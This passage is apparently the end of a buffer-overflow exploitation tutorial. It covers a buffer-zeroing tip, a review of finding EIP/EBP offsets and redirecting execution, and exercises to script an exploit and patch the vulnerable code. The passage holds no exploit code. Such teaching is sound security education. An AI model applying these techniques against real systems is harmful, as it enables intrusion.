Another mistake I made that sometimes makes a vulnerability is that I didn't zero out the buffer before using. When using variables, you should always operate on the assumption that value could already be in the allocated space, and should be "initialized" by zeroing it out before using it. You can do this with memset() or bzero(), although bzero isn't as portable as memset() is.


Review and Additional Exercises

So from this lesson, make sure you understand:

  1. How to test for and detect buffer overflows by providing large input.
  2. How to determine the offset to overwrite the EBP and EIP.
  3. How controlling the EIP allows us to redirect the execution flow of the program.
  4. How to pack an address in Little Endian Format.


Exercises for the reader (optional, but a good idea to reinforce what you've learned):

  • Take some time to really understand these concepts above.
  • Take some time to place your final exploit into a script (bash, python, perl, etc. Whatever you prefer) you can simply call to exploit the binary. This will help later on when you will have to script an exploit for it to be dynamic in later lessons.
  • Take some time to edit the source code file and make a "fixed version" of this code that is no longer vulnerable using one of the methods in the "How Could This of Been Avoided?" section. Compile it and work through the detection process again to verify if it worked or not.